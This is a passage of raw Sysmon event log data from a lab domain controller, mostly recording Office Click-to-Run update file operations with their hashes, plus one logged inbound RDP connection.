23542300x800000000000000071646Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:54.641{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\Windows\Installer\{90160000-000F-0000-1000-0000000FF1CE}\xlicons.exeMD5=4CB3B2C19CCA9A8D66DE07FC6A42789C,SHA256=B7DA62C8CB9926A361F8223C91F1782DAA1A894E21C72B8956AB5D7E6C0DB723,IMPHASH=00000000000000000000000000000000truetrue 23542300x800000000000000071645Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:54.594{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\Windows\Installer\{90160000-000F-0000-1000-0000000FF1CE}\wordicon.exeMD5=0173CB76EC9649A6B0F9CFCA8BAF29A8,SHA256=8CE5E3E2DAE5E4328C307069BCA9882433DC136311FEC9D3F29C708FFFD4DBD3,IMPHASH=00000000000000000000000000000000truetrue 23542300x800000000000000071644Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:54.548{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\Windows\Installer\{90160000-000F-0000-1000-0000000FF1CE}\visicon.exeMD5=673B6717EF7074AFE894C936F9A7D16D,SHA256=FC23CA49ECBC442807C75A69F5A293F1228CD65F286E7933048B5C3B9EA465A8,IMPHASH=00000000000000000000000000000000truetrue 23542300x800000000000000071643Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:54.516{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\Windows\Installer\{90160000-000F-0000-1000-0000000FF1CE}\sscicons.exeMD5=BD8E8195E8C30198F67F4BCBB8919A58,SHA256=288FF9C3EECB000CBFB04A74C057C915406F42D04ABE3C631CCE7680AE431F4D,IMPHASH=00000000000000000000000000000000truetrue 23542300x800000000000000071642Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:54.516{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\Windows\Installer\{90160000-000F-0000-1000-0000000FF1CE}\pubs.exeMD5=36938F8C01932569CD554048D2563B8B,SHA256=B27ACDE29FF99FF25BB1E6360CCC312E319FA7AABA83AB788BD6B6A9495CF651,IMPHASH=00000000000000000000000000000000truetrue 23542300x800000000000000071641Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:54.501{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\Windows\Installer\{90160000-000F-0000-1000-0000000FF1CE}\pptico.exeMD5=2D0DA9962D04DE702CE14943E5B49641,SHA256=3414FB97C4CCDB30B59EDEB076F21BEB6388E0874B8849A476F12A0E56CDC815,IMPHASH=00000000000000000000000000000000truetrue 23542300x800000000000000071640Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:54.454{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\Windows\Installer\{90160000-000F-0000-1000-0000000FF1CE}\pj11icon.exeMD5=167E06C7CC5BA026C619C99236ADAFFF,SHA256=4EE86CDEBCA44C7C8EE669691A83A81D322B38CE29F0E094E8B7102507FDE794,IMPHASH=00000000000000000000000000000000truetrue 23542300x800000000000000071639Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:54.438{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\Windows\Installer\{90160000-000F-0000-1000-0000000FF1CE}\outicon.exeMD5=538FBFE94F639D15F59171CC4885F329,SHA256=01FB5E699D479D41EFAC8DB3674B404AEF3075677023278AD97E7CD62E40184F,IMPHASH=00000000000000000000000000000000truetrue 23542300x800000000000000071638Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:54.423{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\Windows\Installer\{90160000-000F-0000-1000-0000000FF1CE}\osmclienticon.exeMD5=B43C26006B8585C71DCE98990D0EC506,SHA256=2AFFCE5C7E727E5F666E9D2802D8F65AEF369AC72FF4B166BB026A52255FA966,IMPHASH=00000000000000000000000000000000truetrue 23542300x800000000000000071637Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:54.423{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\Windows\Installer\{90160000-000F-0000-1000-0000000FF1CE}\osmadminicon.exeMD5=B43C26006B8585C71DCE98990D0EC506,SHA256=2AFFCE5C7E727E5F666E9D2802D8F65AEF369AC72FF4B166BB026A52255FA966,IMPHASH=00000000000000000000000000000000truetrue 23542300x800000000000000071636Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:54.423{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\Windows\Installer\{90160000-000F-0000-1000-0000000FF1CE}\ohub32.exeMD5=0CCF7B0C47406B96A532283371DC479D,SHA256=8421244540A7FB5E360B608876466BDF467897ECAA1942ED610B13E23DEB64E3,IMPHASH=B792A47605750FED81EE5325A1DF32EBtruetrue 23542300x800000000000000071635Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:54.391{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\Windows\Installer\{90160000-000F-0000-1000-0000000FF1CE}\msouc.exeMD5=C8FA884A3C1FADD4F30DFFF83057B9B9,SHA256=AF88179D2281097E490A7957EC5DD1F66CE23F0071CF89C6C3EF08A59105445B,IMPHASH=00000000000000000000000000000000truetrue 23542300x800000000000000071634Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:54.391{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\Windows\Installer\{90160000-000F-0000-1000-0000000FF1CE}\misc.exeMD5=90CC680AC7E3F1AC2C024A757D1294DF,SHA256=08C998A50167B144386A2B6F1D76A7EDE8168CB8F0781AE75CE80759CD36027F,IMPHASH=00000000000000000000000000000000truetrue 23542300x800000000000000071633Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:54.376{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\Windows\Installer\{90160000-000F-0000-1000-0000000FF1CE}\lyncicon.exeMD5=5BBECE338712AB085561565694DBC7CC,SHA256=EC822849B4FE1A157B1055CCD0D1EB1720D4EE95C71D42C40E8F21882776AF95,IMPHASH=00000000000000000000000000000000truetrue 23542300x800000000000000071632Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:54.360{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\Windows\Installer\{90160000-000F-0000-1000-0000000FF1CE}\joticon.exeMD5=25BAF758CD6C6D43B07764AD518DAC79,SHA256=A56AD5D9A5703C1D603BC2B44A7B8D2F76D8A4B0C5A059400B816BAE65990B5A,IMPHASH=00000000000000000000000000000000truetrue 23542300x800000000000000071631Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:54.344{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\Windows\Installer\{90160000-000F-0000-1000-0000000FF1CE}\grv_icons.exeMD5=6C7384F8A58B2E6D6BD15456C2612621,SHA256=F9331377035CA0BE40FB0563C0C7FC8C1902041DE8C596871E8E853A91E73408,IMPHASH=00000000000000000000000000000000truetrue 23542300x800000000000000071630Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:54.344{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\Windows\Installer\{90160000-000F-0000-1000-0000000FF1CE}\graph.icoMD5=58F5AC079150EECE385C296FFB565A16,SHA256=69C12CB174CCBBF92B9C39532B576703BC058C7FD3E58F28BB723621F64D687D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000071629Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:54.344{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\Windows\Installer\{90160000-000F-0000-1000-0000000FF1CE}\dbcicons.exeMD5=BD8E8195E8C30198F67F4BCBB8919A58,SHA256=288FF9C3EECB000CBFB04A74C057C915406F42D04ABE3C631CCE7680AE431F4D,IMPHASH=00000000000000000000000000000000truetrue 23542300x800000000000000071628Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:54.344{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\Windows\Installer\{90160000-000F-0000-1000-0000000FF1CE}\accicons.exeMD5=71135446376E13B73FB733895EB8EBF6,SHA256=4FF1FC4A03DB863322A3D91D080AAC24D02B615336D6DDBA5A5734C00CCFC186,IMPHASH=00000000000000000000000000000000truetrue 354300x800000000000000071627Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:52.037{A7A01FEF-B626-607E-0F00-00000000BB01}1136C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse5.188.206.230-1464-false10.0.1.14win-dc-339.attackrange.local3389ms-wbt-server 23542300x800000000000000071626Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:54.282{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\Windows\assembly\GAC_MSIL\Microsoft.Office.BusinessData.Intl\16.0.0.0__71E9BCE111E9429C\microsoft.office.businessdata.intl.dllMD5=3AAB306A943B040818C1D5A90C8D381D,SHA256=EE3F18937810AA6EF1D74C9B86F9E35D7870937FA65737153A4A4293E61240B1,IMPHASH=DAE02F32A21E03CE65412F6E56942DAAtruetrue 23542300x800000000000000071625Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:54.282{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\Windows\assembly\GAC_MSIL\Microsoft.Office.BusinessData\16.0.0.0__71E9BCE111E9429C\microsoft.office.businessdata.dllMD5=E014BF99779B01A6203AB6292989DE86,SHA256=333B413B98982344A19C83FB5BC178F58B500EA39382BF881E2BD791A9113EF8,IMPHASH=DAE02F32A21E03CE65412F6E56942DAAtruetrue 23542300x800000000000000071624Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:54.266{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\Windows\assembly\GAC_MSIL\Microsoft.BusinessData\16.0.0.0__71E9BCE111E9429C\Microsoft.BusinessData.dllMD5=1044EBE23C09C06E4F31924234D7C275,SHA256=B234F635D8F65F37D96E5AF6B67884C10AE8BC115BF91B00EC7BC2F7E7FFB7A8,IMPHASH=DAE02F32A21E03CE65412F6E56942DAAtruetrue 23542300x800000000000000071623Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:54.266{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\Windows\assembly\GAC_MSIL\Microsoft.AnalysisServices.AdomdClient\13.0.0.0__89845DCD8080CC91\Microsoft.AnalysisServices.AdomdClient.dllMD5=4748875BDBBF16EAC431FBA499FDECC6,SHA256=665C96C531908E9BFDBF120E62AD8EC1319B82FE89C7538046B8ACC561D03F94,IMPHASH=DAE02F32A21E03CE65412F6E56942DAAtruetrue 23542300x800000000000000071622Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:54.251{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\Windows\assembly\GAC_64\Microsoft.Office.Access.BusinessDataCatalog\16.0.0.0__71E9BCE111E9429C\Microsoft.Office.Access.BusinessDataCatalog.DLLMD5=46BE05D8AA7E17B32B3D4A158CEFA51D,SHA256=D308662A5AEC5581B51CA81FEABD44D264A979BBD80B252DDA4077370F42EAF5,IMPHASH=A271E5E643739A4F9E374745E641353Ftruetrue 23542300x800000000000000071621Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:54.235{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\SystemX86\vcruntime140.dllMD5=E51018E4985943C51FF91471F8906504,SHA256=FF9C1123CFF493A8F5EACB91115611B6C1C808B30C82AF9B6F388C0EF1F6B46D,IMPHASH=DBF59B100B5A77256457CF057352B441truetrue 23542300x800000000000000071620Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:54.235{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\SystemX86\vccorlib140.dllMD5=E88E2BF24A4D846C7F8E313D75EED528,SHA256=2F7E17BC746ABF55122EE1D2608DB7240DE4B4428BE13DFEE8C3E03DB6F9B360,IMPHASH=E2C243EAA5D873A145FCEF834080DE02truetrue 23542300x800000000000000071619Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:54.235{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\SystemX86\msvcp140_1.dllMD5=DA49A6A71270A73D0BDA69E8E7F74F8E,SHA256=C5A6507A240A50A20F7D3FDF014D21176F909299F0F381200E389534CF93FABE,IMPHASH=B783879E062A97E0892B4F847CCC585Btruetrue 23542300x800000000000000071618Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:54.235{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\SystemX86\msvcp140.dllMD5=5FD0772C30A923159055E87395F96D86,SHA256=02C7259456EAC8CBADFB460377BA68E98282400C7A4A9D0BF49B3313EF6D554D,IMPHASH=F2D585FF96AFA3A77E09F5B37E7B3230truetrue 23542300x800000000000000071617Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:54.219{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\SystemX86\mfcm140u.dllMD5=55097578603CB3AA8563532421636A81,SHA256=495F1970CD1E211AC7CBA97BB53F818D985A81340E016FFBCE64DD46C03CC92F,IMPHASH=280C65675416182A1C677A00D2E28B3Btruetrue 23542300x800000000000000071616Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:54.219{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\SystemX86\mfc140u.dllMD5=F8EBBB4C28AB643471B124701DA5B71A,SHA256=DF8543E39C6C04440734A26B25A8ADB34460D4AD08FD41E2468F067F1284E582,IMPHASH=C2C401022BB95036E7638802C8DA49BDtruetrue 23542300x800000000000000071615Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:54.157{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\SystemX86\mfc140enu.dllMD5=419D85FEAFB0132090F2FF5827F82CB5,SHA256=90C091FDD8E2169C4949155C67083E76F03C86038E385512A8ABA9250B38651C,IMPHASH=00000000000000000000000000000000truetrue 23542300x800000000000000071614Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:54.157{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\SystemX86\mfc140.dllMD5=A70CDE6E86E34D7B1364D7AFD1A414F9,SHA256=6294ECB6CC1FA5317DC32E307E77B6C435166D8D0F99CE6E2A087085D3420D44,IMPHASH=49CB4C300F5F31D98FC65B365BBEF94Etruetrue 23542300x800000000000000071613Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:54.126{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=EFAF91C60CA2D29DEE265394D4224432,SHA256=9CEE35A10B48989BF4899D6E6D8C1BD626026557E537E14E20800360E2F47612,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000071612Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:54.094{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\SystemX86\concrt140.dllMD5=773091E3923378F9B529CDA45E32C489,SHA256=6CC8FA5CE54B2B8C99E22A0E37179EBA9D418568D142AC58FAD52DD28E867A17,IMPHASH=720042EA97BFDE1DFC328C5715BE448Dtruetrue 23542300x800000000000000071611Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:54.094{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\System\VEN2232.OLBMD5=C09E01B2D65A20D203330AD348936464,SHA256=6A18FA706EA802C1C2A56B3D049A2DE44E39536B1CA0FFB5ED8B5906751CDD7C,IMPHASH=00000000000000000000000000000000truetrue 23542300x800000000000000071610Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:54.094{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\System\vcruntime140_1.dllMD5=9040ED0FDF4CE7558CBFFB73D4C17761,SHA256=6CC4315DACEB0522816C60678344466CB452426267F70C7FAAE925361674E774,IMPHASH=AE0BDE6314FA2027B54CE04898F6AB69truetrue 23542300x800000000000000071609Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:54.094{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\System\vcruntime140.dllMD5=23105A395B807D9335219958B4D0CEC1,SHA256=61832990E364DCA5BFA2C61D930F00ACAAE6D1AAA3130392403455AE9A1125A5,IMPHASH=F143E2868EFDE0FCB493BD3051708A62truetrue 23542300x800000000000000071608Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:54.079{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\System\vccorlib140.dllMD5=DDD9457EF184CC3897B8198D262F4339,SHA256=41B6AF9484C860804C69E00C9D7FEE22EFE5F769C51355936FC9DE248221DE94,IMPHASH=4A5F3C3AA39A4E0497DFF0471239D5F9truetrue 23542300x800000000000000071607Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:54.079{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\System\vccorlib120.dllMD5=BDD8AE768DBF3E6C65D741CB3880B8A7,SHA256=602ADD77CBD807D02306DE1D0179CB71A908EECB11677116FC206A7E714AB6D6,IMPHASH=85727CB86AAFD871280FFE38FF204B60truetrue 23542300x800000000000000071606Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:54.063{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\System\vccorlib110.dllMD5=2AEB4F8E2BD49FA46E7FCA142A1003A8,SHA256=F5F635C0CF8252B81C8283AE7063E5BDBC7D608EE8798EC6064707B489339D5D,IMPHASH=26901E30C69F9783330D2859D883C1CCtruetrue 23542300x800000000000000071605Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:54.063{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\System\msvcr120.dllMD5=9C861C079DD81762B6C54E37597B7712,SHA256=AD32240BB1DE55C3F5FCAC8789F583A17057F9D14914C538C2A7A5AD346B341C,IMPHASH=8F18E22935EF8B336E246EE763FBEC97truetrue 23542300x800000000000000071604Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:54.048{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\System\msvcr110.dllMD5=7C3B449F661D99A9B1033A14033D2987,SHA256=AE996EDB9B050677C4F82D56092EFDC75F0ADDC97A14E2C46753E2DB3F6BD732,IMPHASH=2D8550B19D324144E95B49AAE32A0DCAtruetrue 23542300x800000000000000071603Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:54.032{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft 